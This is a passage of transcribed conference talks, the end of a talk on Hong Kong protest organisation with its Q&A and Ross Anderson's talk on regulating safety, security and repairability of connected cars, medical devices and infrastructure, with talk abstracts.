lived in an anonymous, major metropolis for years and probably barely talked to each other, but who are now basically getting together and starting to do things together and trying to keep these things going to protect themselves. Another thing is that there has been a push for building and creating unions, so labor unions. More than 24 have been formed this entire year across a range of sectors. There were several attempts at organizing strikes in Hong Kong over the summer. A lot of those weren't very successful because people still went to work in many cases, but so people are essentially organizing more long-term and trying to get people to join unions, so they have organizing capacity for the long run. And again, this is a picture from the district council elections. It's incredibly important to recognize the organizational capacity that went into the elections. There are all these people out there now that know how to mobilize and have now partaken in a political campaign, in an electoral campaign, and all of that is knowledge that now exists amongst young people, amongst older people. And all of these are organizations and things that hopefully people will be able to build on in the long run. So what next? I think it's important to recognize that what people have been able to do in Hong Kong is incredible from an organizational capacity and also has meant that people have given up a lot in many cases. People have gone broke. There are young people who have been kicked out of their homes by their parents because they don't see eye-to-eye politically. Some people have just spent all their money on protest gear. Other people are facing charges of up to 10 years in prison and because of the incredible backlog might not know for a very long time what's going to happen. People are scared of the police. And so one big question is how things will be able to keep going. And I think one thing that if you talk to someone from Hong Kong who's part of the protest movement, that's also incredibly important to recognize that everyone in Hong Kong, also people on both sides, right? Everyone in Hong Kong, these are people, and these are not people who are just kind of acting out like a geopolitical game like risk or something, but these are real people who are really going to the limits in many cases. More specifically, there is a rally planned and announced for January 1st. They're still waiting for the let-of-no-objection, which means they don't know yet whether it will be a legal rally or not. So this is really going to be them trying, the movement trying to show that they're going to be able to keep going through 2020 and maybe longer. The unrest and discontent is not going to go away. I think that's very clear. So many people have been politicized over the past few months, and so many people have lost trust in their government and in very fundamental institutions such as hospitals and the police. And that's something that's not just going to go away, because that's going to be a problem that will haunt the government for a long time to come. Especially, remember that number, almost 100% of people under 16 opposed the extradition bill, and those people are deeply involved and incredibly politicized. So if anything, the people who are coming up are more anti-government or more willing to go protest than anyone who's already out in the streets. The things that you can do, go and follow Hong Kong journalists and support them. If you're on Twitter, Laurel Chor and Hong Kong Hermit, I've linked both of them, have Twitter lists where you can follow local journalists who have been living in Hong Kong, who grew up in the city, who have been reporting on the protests for months and some cases for years. A lot of these people have already reported on the Umbrella revolution, so go and follow those people, because they essentially have the best information. They speak the language, and they will be able to report firsthand. And you'll also run into those crazy livestream websites. You should also follow and donate to Hong Kong Free Press, which is an independent media outlet that was formed after the Umbrella protests, and that's been doing some incredible coverage. They hired a really good photographer who took a bunch of the pictures that you saw here, and she also was arrested by police at some point for participating in a riot. So yeah, go do that, follow those people. This is a story that is not over, and it will not be over any time soon. And so the only thing I can tell you is to go to the source and listen to the people who are right on the ground. Just but not least, I can only speak about things that pertain to China, because that's my area of expertise, or in this case, Hong Kong. But this has been a year with a lot of protest movements all over the world, and Hong Kongers are by far from the only people who went onto the streets at great, immense personal risk to stand up to their governments. In India, in student protests against the anti-Muslim exclusion law, I think 17 or 20 people were killed in the past few weeks, and the Iraqi government just gunned down protesters that went out to protest for political rights. People have been protesting in Chile, in Iran, in Syria, in a bunch of places. And those things might not be as well covered necessarily as Hong Kong. I certainly don't read about them as much, but that's also my personal interest. But I would encourage you, I think if you care about the things that people are doing in Hong Kong that they're trying to achieve, I would urge you to inform yourself about the things that are happening in other places as well. And in a lot of cases, people who are in these places recognize that they stand for similar things, right? They want their governments to listen to them, and they want to be represented. On the left, you have a graffiti from Lebanon, where in the middle you can see the Hong Kong slogan, five demands not one less in Chinese, stenciled on the wall. And on the left and the right, you have Iraqi and Lebanese protest slogans that call for all corrupt government officials to resign, regardless of which ethnic and religious faction they're part of. Whereas on the right, you have a protest poster from someone from Hong Kong who just lists all the protests that they say we're fighting for the same thing, we're fighting for freedom and justice, and so we should feel like we're part of the same thing. And so I just want to urge you that if you care about any of these things, then you should probably care about it in more than one place. Thank you. Thank you. Thank you, Catherine. I don't know if I told you, but I asked for this shift specifically because of your talk. Thank you. It was everything I expected, and more. So we have time for two or three questions. We'll take one question from the internet, because there is a lot of people who couldn't make it. Yeah. So it seems that Telegram is used a lot during protests, and one of the IC users mentions that it's centralized, and asks if there were any problems with this centralized and controlled thing, and if there are attempts to move this to decentralized communication solutions. Thank you. I think, oh, I just saw that I misspelled MIT in my email. That's very smart. The Telegram question is important. So Telegram has actually come under DDoS attacks for multiple times. The first time was in the summer, and there was another time later, like a couple of weeks ago, so that shows clearly that Telegram is a vulnerability in some ways, right? In the summer after the DDoS attack, Telegram said that they think it was a nation state actor just based on the volume of the DDoS attack. So that is kind of like a point of vulnerability. In reaction to that and another DDoS attack on LAHKG, people, there was some discussions of moving to other platforms, but those ultimately didn't pan out. So I think organizationally, it is probably not ideal to be working on a centralized platform, but the crucial question is whether you have alternatives that people can get on easily, because you're organizing so many people, and you really want the smallest amount of friction possible. And I think that is the biggest challenge. So there were kind of like proposals for using different apps that, for example, work without Internet for the worst case scenario that the government might switch off the Internet in Hong Kong. But my read is that those ultimately didn't pan out because those are not necessarily apps that people are used to that might not be as easy to use, and also because there is kind of like an institutional stickiness. So I think it would probably take some kind of disaster, like either Telegram getting blocked or taken down in Hong Kong, or kind of like being completely taken down by DDoS attack for people to actually switch to another platform. So I think there, I agree, from a security perspective, it's probably not ideal, but the biggest challenge is the kind of the organizational challenge of getting people to move wholesale to a completely different platform. Thank you. And now one question from the audience. Microphone number three, it's the last question, so make it count. That's a lot of responsibility, but I really wanted to ask about police brutality. You mentioned that people were surprised by police brutality, but how can it be a surprise? So it's only new police force, continental China, who became suddenly brutal, or people were not paying attention, or was police brainwashed? Thank you. This is a good question. I think we have absolute answers to this. The reason people were surprised is that the Hong Kong police force used to have an incredibly good reputation as a police force that was very reasonable and appropriate in its use of force, and that's clearly a reputation that's completely gone down the drain over the past few months. The thing about police coming in from China is something there are repeated reports, but they're always incidental, and I haven't really seen any large-scale verified reports that there was any major influx of mainland police officers into the Hong Kong police, so it's probably not that. I think one thing that people observed after the umbrella movement was that there was kind of a siege mentality within the police itself, so that they felt like they were being assaulted by the entirety of society, so it's possible that that was kind of like the formation of increasingly strictly drawn lines and camps, where the police felt like they're under assault from everyone else and that they're justified in using force, which might be one of the explanations why they've also been so opposed to kind of like an independent investigation. In addition to that, another thing is that they've also been completely operating at capacity, so we know that they've paid, I think, 900 million Hong Kong dollars or something, an absurd amount in overtime pay to the police. So I think one thing is also that these are people who in many cases are not trained in dealing with the events that they're supposed to be dealing with, and so it seems that they are possibly reacting by lashing out in more violent ways than would probably be appropriate, so it might just also be a lack of training, but there's no definitive answer. Thank you. Thanks. Catherine Tai, who has been heroically standing here for 90 minutes, talking nonstop, which is hard, people, so a huge round of applause.
The people of Hong Kong have been using unique tactics, novel uses of technology, and a constantly adapting toolset in their fight to maintain their distinctiveness from China since early June. Numerous anonymous interviews with protesters from front liners to middle class supporters and left wing activists reveal a movement that has been unfairly simplified in international reporting. The groundbreaking reality is less visible because it must be - obfuscation and anonymity are key security measures in the face of jail sentences up to ten years. Instead of the big political picture, this talk uses interviews with a range of activists to help people understand the practicalities of situation on the ground and how it relates to Hongkong's political situation. It also provides detailed insights into protestors' organisation, tactics and technologies way beyond the current state of reporting. Ultimately, it is the story of how and why Hongkongers have been able to sustain their movement for months, even faced with an overwhelming enemy like China. This is the story of how and why Hongkongers have been able to sustain their movement so long, even faced with an overwhelming enemy like China. The protestors have developed a range of tactics that have helped them minimise capture and arrests and helped keep the pressure up for five months: They include enforcing and maintaining anonymity, both in person and online, rapid dissemination of information with the help of the rest of the population, a policy of radical unanimity to maintain unity in the face of an overwhelming enemy and Hongkongers’ famous “be water” techniques, through which many of them escaped arrest.
10.5446/53129 (DOI)
Our next speaker is a professor of security engineering at Cambridge University. He is the author of the book Security Engineering. He has done a lot of things already. He has been inventing semi-invasive attacks based on inducing photo-currence. He has done API attacks. He has entered a lot of stuff. If you read his bio, it feels like he's involved in almost everything related to security. So please give a huge round and a warm welcome to Russ Anderson and his talk, The Sustainability of Safety, Security and Privacy. Thanks. Right, it's great to be here. I'm going to tell a story that starts a few years ago. It's about the regulation of safety. Just to set the scene, you may recall that in February this year, there was this watch, Enox's Safe Kid 1, suddenly got recalled. Why? Well, it turned out that it had unencrypted communications with a back-end server, allowing unauthenticated access. Translated into layman language, that meant that hackers could track and call your kids, change the device ID and do arbitrary bad things. This was immediately recalled by the European Union using powers that it had under the Ready Equipment Directive. This was a bit of a wake-up call for industry, because up until then, people active in the so-called Internet of Things didn't have any idea that if they produced an unsafe device, then they could suddenly be ordered to take it off the market. Anyway, back in 2015, the European Union's research department asked Aaron Leverett, Richard Clayton and me to examine what IoT implied for the regulation of safety, because the European institutions regulate all sorts of things from toys to railway signals and from cars through drugs to aircraft. If you start having software and everything, does this mean that all these dozens of agencies suddenly start to have software safety experts and software security experts? So what does this mean in institutional terms? We produced a report for them in 2016, which the Commission sat on for a year. A version of the report came out in 2017 and later that year, the full report. The gist of our report was once you get software everywhere, safety and security become entangled. In fact, when you think about it, the two are the same in pretty well all the languages spoken by EU citizens. It's only English that distinguishes between the two. With Britain leaving the EU, of course, you will have languages in which safety and security become the same throughout Brussels and throughout the continent. But anyway, how are we going to update safety regulation in order to cope? This was the problem that Brussels was trying to get its head around. So one of the things that we had been looking at over the past 15, 20 years is the economics of information security because often big complex systems fail because the incentives are wrong. If Alice guards a system and Bob pays the cost of failure, you can expect trouble. And many of these ideas go across to safety as well. Now, it's already well known that markets do safety in some industries such as aviation way better than in others such as medicine. And cars were dreadful for many years. For the first 80 years of the car industry, people didn't bother with things like seat belts. And it was only until Ralph Nader's book, Unsafe at Eddie Speed, led the Americans to set up the national highways, transportation and safety administration. And various court cases brought this forcefully to public attention that car safety started to become a thing. Now, in the EU, we've got a whole series of broad frameworks and specific directives and detailed rules. And there's over 20 EU agencies plus the UNEC and play here. So how can we navigate this? Well, what we were asked to do was to look at three specific verticals and study them in some detail so that the lessons from them could be then taken to the other verticals in which the EU operates. And cars were one of those. And some of you may remember the Karshark paper in 2011 where a guy from San Diego and the University of Washington figured out how to hack a vehicle and control it remotely. And I used to have a lovely little video of this that the researchers gave me, but my Mac got upgraded to Catalina last week and it doesn't play anymore. So for Schlimbesen, one second after each other. Yeah. OK. We'll get it going sooner or later. OK, this was largely ignored because one little video didn't make the biscuit. But in 2015, this suddenly came to the attention of the industry because Charlie Miller and Chris Fallaschek, two guys who had been in the NSA's hacking team, hacked a cheap jerky using Chrysler's UConnect. And this meant that they could go down through all the Chrysler vehicles in America and look at them one by one and ask, where are you? And then when they found a vehicle that was somewhere interesting, they could go in and do things to it. And what they found was that to hack a vehicle, suddenly you just needed the vehicle's IP address. And so they got a journalist into a vehicle and they got him to slow down and had trucks behind him hooting away and eventually they ran the vehicle off the road. And when the TV footage of this got out, suddenly people carried. They'd make the front pages of the press in the USA and Chrysler had to recall 1.4 million vehicles for a software fix, which meant actually reflashing the firmware of the devices. And it cost them billions and billions of dollars. So all of a sudden, this is something to which people paid attention. Some of you may know this chap here, at least by sight. This is Martin Vinterkorn who used to run Volkswagen and when it turned out that he had hacked millions and millions of Volkswagen vehicles by putting in evil software that defeated emissions controls, that's what happened to Volkswagen's stock price. Oh, and he lost his job and got prosecuted. So this is an important point about vehicles and in fact about many things in the Internet of Things or Internet of Targets, whatever you want to call it. The threat model isn't just external, it is internal as well. There are bad people all the way up and down the supply chain, even at the OEM. So that's the state of play in cars and we investigated that and wrote a bit about it. Now here's medicine. This was the second thing that we looked at. These are some pictures of the scene in the intensive care unit in Swansea Hospital. So after your car gets hacked and you go off the road, this is where you end up. And just as a car has got about 50 computers in it, you're now going to see that there's quite a few computers at your bedside. How many CPUs can you see? You see there's quite a few. About a comparable number to the number of CPUs in your car. Only here the system's integration is done by the nurse, not by the engineers at Volkswagen or Mercedes. And does this cause safety problems? All sure. Here are pictures of the user interface of infusion pumps taken from Swansea's intensive care unit. And as you can see, they're all different. This is a little bit like if you suddenly had to drive a car from the 1930s, an old Lancerster for example, and then you find that the accelerator is between the brake and the clutch. Right? Honestly, there used to be such cars. You can still find them in antique car ferrets or a Model T Ford, for example, where the accelerator is actually a lever on the dashboard and one of the pedals is a gear change. And yet you're asking nurses to operate a variety of different pieces of equipment. And look for example at the bodyguard 545. At the one on the top, to increase the dose, right, this is the morphine that is being dripped into your vein once you've had your car crash, to increase the dose you have to press to and to decrease it you have to press zero. And at the bodyguard 545 on the bottom right, to increase the dose you press five and to decrease it you press zero. And this leads to accidents, to fatal accidents, a significant number of them. Okay, so you might say, well, why not have standards? Well, we have standards. We've got standards which say that litre should always be a capital L so it is not confused with a one. And then you see that on the bodyguard on the bottom right, millilitres is a capital L in green. Okay, well done, Mr. Bodyguard. The problem is if you look up two lines, you see 500 millilitres is in small letters. So there's a standards problem. There's an enforcement problem. And there's externalities because each of these vendors will say, well, everybody else should standardize on my kid. And there are also various other market failures. So the expert who's been investigating this is my friend Harold Thimbleby, who's a professor of computer science at Swansea. And his research shows that hospital safety usability failures kill about 2,000 people every year in the UK, which is about the same as road accidents. And safety usability, in other words, gets ignored because the incentives are wrong. In Britain and indeed in the European institutions, people tend to follow the FDA in America. And that is captured by the large medical device makers over there. They only have two engineers. They're not allowed to play with pumps, et cetera, et cetera, et cetera. The curious thing here is that as safety and security come together, the safety of medical devices may improve because as soon as it becomes possible to hack a medical device, then people suddenly take care. So the first of this was when Kevin Fu and researchers at the University of Michigan showed that they could hack the hospice and confusion pump over Wi-Fi. And this led the FDA to immediately panic and blacklist the pump, recalling it from service. But then said, Kevin, what's about the 200 other infusion pumps that are unsafe because of the things on the previous slide? Also, the FDA, we couldn't possibly recall all those. Then two years ago, there's an even bigger recall. It turned out that 450,000 pacemakers made by St. Jude could similarly be hacked over Wi-Fi. And so their recall was ordered. And this is quite serious because if you've got a heart pacemaker, it's implanted surgically in the muscle next to your shoulder blade. And to remove that and replace it with a new one, which they do every 10 years to change the battery, is a daycare surgery procedure. You have to go in there, get an anesthetic. They have to have a cardiologist ready in case you have a heart attack. It's a big deal. It cost maybe 3,000 pounds in the UK. And so 3,000 pounds times 450,000 pacemakers multiplied by two for American healthcare costs, and you're talking real money. So what should Europe do about this? Well, thankfully, the European institutions have been getting off their butts on this, and the medical device directors have been revised. And from next year, medical devices will have to have post-market surveillance, risk management, plan, ergonomic design. And here's perhaps the driver for software engineering, for devices that incorporate software. The software shall be developed in accordance with the state of the art, taking into account the principles of development, lifecycle, risk management, including information security, verification, and validation. So there, at least, we have a foothold. And it continues, devices shall be designed and manufactured in such a way as to protect as far as possible against unauthorized access that could hamper the device from functioning as intended. Now, it's still not perfect. Those various things that the manufacturers can do to wriggle, but it's still a huge improvement. The third thing that we looked at was energy, electricity, substations, and electrotechnical equipment in general. There have been one or two talks at this conference on that. Basically, the problem is that you've got a 40-year lifecycle for these devices. Protocols such as Modbus and DNP3 don't support authentication. And the fact that everything has gone to IP networks means that, as with the Chrysler Jeeps, anybody who knows your IP address can read from it, and with an actuator's IP address, you can activate it. So the only practical fix there is to repyrymatize, and the entrepreneurs who noticed this 10 to 15 years ago and set up companies like Belden have now made lots and lots of money. Companies like BP now have thousands of such firewalls, which isolate their chemical and other plants from the internet. So one way in which you can deal with this is having one component that connects you to the network, and you replace it every five years. There's one way of doing, if you like, sustainable security for your oil refinery. But this is a lot harder for cars, which have got multiple RF interfaces. A modern car has maybe 10 interfaces. You know, there's the internal phone, there's the short-range radio link for remote key entry, there are links to the devices that monitor your tar pressure, there's all sorts of other things. And every single one of these has been exploited at least once. And there are particular difficulties in the auto industry because of the fragmented responsibility in the supply chain between the OEMs and the tier ones and the specialists to produce all the various bits and pieces that get glued together. Anyway, so the broad questions that arise from this include, who will investigate incidents and to whom will they be reported? Right? How do we embed responsible disclosure? How do we bring safety engineers and security engineers together? This is an enormous project because security engineers and safety engineers use different languages. We have different university degree programs. We go to different conferences. And the world of safety is similarly fragmented between the power people, the car people, the naval people, the signal people, and so on and so forth. Some companies are beginning to get this together. The first is Bosch, which put together their safety engineering and security engineering professions. But even once you have done that in organizational terms, how do you teach a security engineer to think safety and vice versa? Then the problem that bothered the European Union are the regulators all going to need security engineers. Right? I mean, many of these organizations in Brussels don't even have an engineer on staff. Right? They are mostly full of lawyers and policy people. And then of course, for this audience, how do you prevent abuse of lock-in? In America, if you've got a tractor from John Deere, and then if you don't take it to a John Deere dealer every six months or so, it stops working. Right? And if you try and hack it so you can fix it yourself, then John Deere will try to get you prosecuted. We just don't want that kind of stuff coming over the Atlantic and to Europe. So we ended up with a number of recommendations. We thought that we would get vendors to self-certify for the CE mark that products could be patched if need be. That turned out to be not viable. We then come up with another idea that things should be secured by default for the update of the radio equipment directive, and that didn't get through the European Parliament either. It was Mozilla that lobbied against it. Eventually, we got something through which I'll discuss in a minute. We talked about requiring a secure development life cycle with vulnerability management, because we've already got standards for that. We talked about creating a secure and European security engineering agency, so there would be people in Brussels to support policy makers. And the reaction to that a year and a half ago was to arrange for UNISA to be allowed to open an office in Brussels so that they can hopefully build a capability there with some technical people who can support policy makers. We recommended extending the product liability directive to services. There is enormous pushback on that. Companies like Google and Facebook and so on don't like the idea that they should be as liable for mistakes made by Google Maps, as for example, Garmin is liable for mistakes made by the navigators. And then there's the whole business of how do you take the information that European institutions already have on breaches and vulnerabilities and report this not just to UNISA, but to safety regulators and users, because somehow you've got to create a learning system. And this is perhaps one of the big pieces of work to be done. Once all cars are semi-intelligent, once everybody's got telemetry and once there are bigger bites of data everywhere, then whenever there's a car crash, the data has to go to all sorts of places, to the police, to the insurers, to courts, and then of course up to the car makers and regulators and component suppliers and so on. How do you design the system that will cause the right data to get to the right place, which will still respect people's privacy rights and all the various other legal obligations? This is a huge project and nobody has really started to think yet about how it's going to be done. At present, if you've got a crash in a car like a Tesla, which has got very good telemetry, you basically have to take Tesla to court to get the data because otherwise they won't hand it over. We need a better regime for this. And that at present is a blank slate. It's up to us, I suppose, to figure out how such a system should be designed and built and it will take many years to do it. If you want a safe system, a system that learns, this is what it's going to involve. But there's one thing that struck us after we'd done this work. After we'd delivered this to the European Commission and I'd gone to Brussels and given a talk to dozens and dozens of security guys, Richard Clayton and I went to Schloss Dagstuhl for a week-long seminar on some other security topic. And we were just chatting one evening and we said, well, what did we actually learn from this whole exercise on standardization and certification? Well, it's basically this. Those two types of secure thing that we currently know how to make. The first is stuff like your phone or your laptop, which is secure because you patch it every month, right? But then you have to throw it away after three years because Larry and Sergey don't have enough money to maintain three versions of Android. And then we've got things like cars and medical devices where we test them to death before release. And we don't connect them to the internet and we almost never patch them unless Charlie Miller and Chris Fellowshet are going to go at your car that is. So what's going to happen to support costs now that we're starting to patch cars? And you have to patch cars because they're online. And once something's online, right, anybody in the world can attack it. So if a vulnerability is discovered, it can be scaled. And something that you could previously ignore suddenly becomes something that you have to fix. And if you have to pull all your cars into a garage to patch them, that costs real money. So you need to be able to patch them over the air. So all of a sudden, cars become like computers and phones. So what's this going to mean? So this is the trilemma. If you get a standard safety life cycle, there's no patching. You get safety and sustainability. But you can't go online because you'll get hacked. And if you get the standard security life cycle, you get patching, but that breaks the safety certification. So that's a problem. And if you get patching plus redoing safety certification with current methods, then the cost of maintaining your safety rating can be sky high. So here's the big problem. How do you get safety, security, and sustainability at the same time? Now, this brings us to another thing that a number of people at this Congress are interested in, the right to repair. This is the centennial light. It's been burning since 1901. It's in Livermore in California. It's kind of dim, but you can go there and you can see it. It's still there. In 1924, the three firms who dominated the light business, GE, Osram, and Phillips, agreed to reduce average bulb lifetimes from 2,500 to 1,000 hours in order to sell more of them. And one of the things that's come along with CPUs and communications and so on, with smart stuff to use that horrible word, is that firms are now using online mechanisms, software, and cryptographic mechanisms in order to make it hard or even illegal to fix products. And I believe that there's a case against Apple going on in France about this. Now you might not think it's something that politicians will get upset about that you have to throw away your phone after three years instead of after five years. But here's something you really should worry about, vehicle life cycle economics. Because the lifetimes of cars in Europe have doubled in the last 40 years. And the average edge of a car in Britain, which is scrapped, is now almost 15 years. So what's going to happen once you've got wonderful self-driving software in all the cars? Well, a number of big car companies, including in this country, were taking the view two years ago that they wanted people to scrap their cars after six years and buy a new one. Hey, it makes business sense, doesn't it? If you're Mr. Mercedes, your business model is if the customer is rich, you sell him a three-year lease on a new car. And if the customer is not quite so rich, you sell him a three-year lease on a Mercedes- approved used car. And if somebody drives a seven-year-old Mercedes, that's thought crime. So they should emigrate to Africa or something. So this was the view of the vehicle makers. But here's the rub. The embedded CO2 cost of a car often exceeds its lifetime fuel barn. The best estimate for the embedded CO2 cost of an E-class mark is 35 tons. So go and work out how many liters per 100 kilometers and how many kilometers it's going to run in 15 years. When you come to the conclusion that if you get a six-year lifetime, then maybe you are decreasing the range of the car from 300,000 kilometers to 100,000 kilometers. And so you're approximately doubling the overall CO2 emissions, taking the whole life cycle. Not just the Scorpe 1, but the Scorpe 2 and the Scorpe 3, the embedded stuff as well. And then there are other consequences. What about Africa, where most vehicles are in port in second hand? If you go to Nairobi, all the cars are between 10 and 20 years old. They arrive in the docks in Mombasa when they're already 10 years old, and people drive them for 10 years, and then they end up in Uganda or Chad or somewhere like that, and they're repaired for as long as they're repairable. What's going to happen to road transport in Africa if all of a sudden there's a software time bomb that causes cars to self-destruct 10 years after they leave the showroom? And if there isn't, what about safety? I don't know what the rules are here, but in Britain, I have to get my car through a safety examination every year once it's more than three years old. And it's entirely foreseeable that within two or three years, the mechanic will want to check that the software is up to date. So once the software update is no longer available, that's basically saying this car must now be exported or scrapped. I couldn't resist the temptation to put in a cartoon. My engine's making a weird noise. Can you take a look? Sure, just pop the hood. All the hood latch is also broken. Okay, just pull up to that big pit and push the car, and we'll go get a new one. Right? This is if we start feeding cars the way we treat consumer electronics. So what's a reasonable design lifetime? Well, with cars, the way it's going is maybe 18 years, say 10 years from the sale of the last product in a model range. Domestic appliances, 10 years because of spare's obligation, pastoral life, say 15, medical devices. If a pacemaker lives for 10 years, then maybe you need 20 years. Electricity substations even more. So from the point of view of engineers, the question is how can you see to it that your software will be patchable for 20 years? So as we put in the abstract, if you are writing software now for a car that will go on sale in 2023, what sort of languages, what sort of tool change should you use, what sort of crypto should you use so that you're sure you'll still be able to patch that software in 2043? And that isn't just about the languages and compilers and linkers and so on. That's about the whole ecosystem. So what do the EU do? Well, I'm pleased to say that at the third attempt, the EU managed to get some law through on this directive 771 this year on smart goods, says that buyers of goods with digital elements are entitled to necessary updates for two years or for a longer period of time if this is a reasonable expectation of the customer. This is what they managed to get through the parliament. And what we expect is that this will mean at least 10 years for cars, ovens, fridges, air conditioning and so on because of existing provisions about physical spare's. But what's more, the trader has got the burden of proof in the first couple of years of first disputes. So there's now the legal framework there to create the demand for long-term patching of software. And now it's kind of up to us. If the durable goods we're designing today are still working in 2039, then a whole bunch of things are going to have to change. Computer science has always been about managing complexity ever since the very first high-level languages. And the history goes on from there through types and objects and tools like Git and Jenkins and Coverti. So here's a question for the computer scientists here. What else is going to be needed for sustainable computing once we have software in just about everything? So research topics to support 20-year patching include a more stable and powerful tool chain. We know how complex this can be from crypto with looking at the history of the last 20 years of TLS. Cars teach that it's difficult and expensive to sustain all the different test environments you have for different models of cars. Control systems teach whether you can make small changes to the architecture, which will then limit what you have to patch. As I said, teachers, how do you go about motivating OEMs to patch products that they no longer sell? In this case, it's European law, but there's maybe other things you can do too. What does it mean for those of us who teach and research in universities? Well, since 2016, I've been teaching safety and security together in the same course to first-year undergraduates because presenting these ideas together in lockstep will help people to think in more unified terms about how it all holds together. In research terms, we've been starting to look at what we can do to make the tool chain more sustainable. For example, one of the problems that you have if you maintain crypto software is that every so often, the compiler writer gets a little bit smarter and the compiler figures out that these extra padding instructions that you put in to make the loops of your crypto routines run in constant time and to scrub the contents of round keys once they were no longer in use, are not doing any real work and it removes them. All of a sudden, from one day to the next, you find that your crypto has sprung a huge big timing leak and then you have to rush to get somebody out of bed to fix the tool chain. One of the things that we thought is that better ways for programmers to communicate intent might help. There's a paper by Laurent Simon, David Chisnell and I where we looked about zeroizing sensitive variables and doing constant time loops with a plug-in in LLVM. That led to your S&P paper a year and a half ago, what you get is what you see and there's a plug-in that you can download and play with. Macroscale sustainable security is going to require a lot more. Despite the problems in the aerospace industry with the 737 Macs, the aerospace industry still has got a better feedback loop of learning from incidents and accidents and we don't have that yet in any of the fields like cars and so on where it's going to be needed. What can we use as a guide? Security economics is one set of intellectual tools that can be applied. We've known for almost 20 years now that complex socio-technical systems often fail because of poor incentives. If Alice guards a system and Bob pays the cost of failure, you can expect trouble. Security economics researchers can explain platform security problems, patching cycle, liability games and so on. The same principles apply to safety and will become even more important as safety and security become entangled. Also we'll get even more data and we'll be able to do more research and get more insights from the data. So where does this lead? Well, our papers on making security sustainable and the thing that we did for the EU standardization and certification in the Internet of Things are on my web page together with other relevant papers on topics around sustainability from smart metering to pushing back on wildlife crime. So the first place to go if you're interested in this stuff and there's also our blog. And if you're interested in these kinds of issues at the interface between technology and policy of how incentives work and how they very often fail when it comes to complex socio-technical systems, then there's the workshop on the economics of information security in Brussels next June is the place where academics interested in these topics tend to meet up. So perhaps we'll see a few of you there in June. And with that, there's a book on security engineering which goes over some of these things. And there's a third edition in the pipeline. Thank you very much, Ross Anderson for the talk. We will start the Q&A session a little bit differently than you're used to. Ross has a question to you. So he told me there will be a third edition of his book and he's not yet sure about the cover he wants to have. So you're going to choose. And so that the people on the stream also can hear your choice. I would like you to make a humming noise for the cover which you like more. You will first see both covers. Cover one and cover two. So who of you would like to pick for the first cover? Come on. And the second choice. Okay. I think we have a clear favorite here from the audience. So it would be the second cover. Thanks. And we will look forward to see this cover next year then. So if you now have questions yourself, you can line up in front of the microphones. You will find eight distributed in the hall, three in the middle, two on the sides. The signal angel has the first question from the Internet. The first question is, is there a reason why you didn't include aviation into your research? We were asked to choose three fields and the three fields I chose were the ones in which we had worked most recently. I did some work in avionics but that was 40 years ago so I'm no longer current. All right. A question for microphone number two please. Hi. Thanks for your talk. What I'm wondering most about is where do you believe the balance will fall in the fight between privacy, the want of the manufacturer to prove that it wasn't their fault and the right to repair? Well this is an immensely complex question and it's one that we'll be fighting about for the next 20 years. But all I can suggest is that we study the problems in detail, that we collect the data that we need to say coherent things to policy makers and that we use the intellectual tools that we have such as the economics of security in order to inform these arguments. That's the best way that we can fight these fights by being clear headed and by being informed. Thank you. A question for microphone number four please. Can you switch on the microphone number four? Oh, sorry, hello, thank you for the talk. As a software engineer arguably I can cause much more damage than a single medical professional simply because of the multiplication of my work. Why is it that there is still no conversation about software engineers carrying liability insurance and being liable for the work they do? Well that again is a complex question and there are some countries like Canada where being a professional engineer gives you particular status. I think it's cultural as much as anything else because our trade has always been free wheeling, it's always been growing very quickly and throughout my lifetime it's been sucking up a fair proportion of science graduates. If you were to restrict software engineering to people with degrees in computer science then we would have an awful lot fewer people. I wouldn't be here for example because my first degree was in pure maths. Alright, a question for microphone number one please. Hi, thank you for the talk. My question is also about aviation because as I understand that a lot of the old or retired aircrafts and other equipment is dumped into the so-called developing countries and with the modern technology and the modern aircraft where the issue of maintained or software or patching would still be in question. But how do we see that rolling out also for the so-called third world countries? Because I am a Pakistani journalist but this worries me a lot because we get so many devices dumped into Pakistan after they are retired and people just use them. I mean it's a country that cannot even afford a licensed operating system so maybe you could shed a light on that. Thank you. Well there are some positive things that can be done. Development IT is something in which we are engaged and you can find the details of my website but good things don't necessarily have to involve IT. One of my school friends became an anaesthetist and after he retired he devoted his energies to developing an infusion pump for use in less developed countries which is very much cheaper than the ones that we saw on the screen there and it's also safe, rugged, reliable and designed for use in places like Pakistan and Africa and South America. So the appropriate technology doesn't always have to be the wizziest, right? And if you've got very bad roads in India and Africa and relatively cheap labor then perhaps autonomous cars should not be a priority. Thank you. Alright we have another question from the internet, the signal angel please. Why force updates by law? Wouldn't it be better to prohibit the important things from accessing the internet by law? Well politics is the art of the possible and you can only realistically talk about a certain number of things at any one time in any political culture, the so called Orvilleton window. Now if you talked about banning technology, banning cars that connected to the internet, as a minister you would be immediately shouted out of office as being a Luddite, right? So it's just not possible to go down that path. What is possible is to go down the path of saying, look if you've got a company that imports lots of dangerous toys that harm kids or dangerous CCTV cameras that are recruited into a botnet and if you don't meet European regulations we'll put the containers on the boat back to China. That is something that can be solved politically. And given the weakness of the car industry after the emission scandal it was possible for Brussels to push through something that the car industry really didn't like. So again it's and even then that was the third attempt to do something about it. So again it's what you can practically achieve in real world politics. All right, we have more questions. Microphone number four please. Hi, I'm an automotive cybersecurity analyst and embedded software engineer. Most a part of the SAE ISO 2143 for automotive cybersecurity standard. Are you aware of the standard that's coming out next year hopefully? I've not done any significant work with it. Sometimes the motor industry have talked about it but it's not something we've engaged with in any detail. Okay, I guess my point is not so much of a question but a little bit of a pushback. A lot of the things you talked about are being worked on and are being considered. Over the year updating is going to be mandated. Just 30, a 30, 40 year life cycle of the vehicle is being considered by engineers. We're not, nobody I know talks about a six year life cycle. That's back in the 80s maybe we talked about planned obsolescence but that's just not a thing. So I'm not really sure where that language is coming from to be honest with you. Well I've been to close motor industry conferences where senior executives have been talking about just that in terms of autonomous vehicles. So yeah it's something that we've disabused them of. Alright so time is an unfortunate the app but I think Ross will be available after the talk as well for questions. So you can meet him here on the side. Please give a huge round of applause for Ross Annesen. Thanks. And thank you for choosing the cover.
What sort of tools and methodologies should you use to write software for a car that will go on sale in 2023, if you have to support security patches and safety upgrades till 2043? Now that we’re putting software and network connections into cars and medical devices, we’ll have to patch vulnerabilities, as we do with phones. But we can't let vendors stop patching them after three years, as they do with phones. So in May, the EU passed Directive 2019/771 on the sale of goods. This gives consumers the right to software updates for goods with digital elements, for the time period the consumer might reasonably expect. In this talk I'll describe the background, including a study we did for the European Commission in 2016, and the likely future effects. As sustainable safety, security and privacy become a legal mandate, this will create real tension with existing business models and supply chains. It will also pose a grand challenge for computer scientists.
10.5446/53132 (DOI)
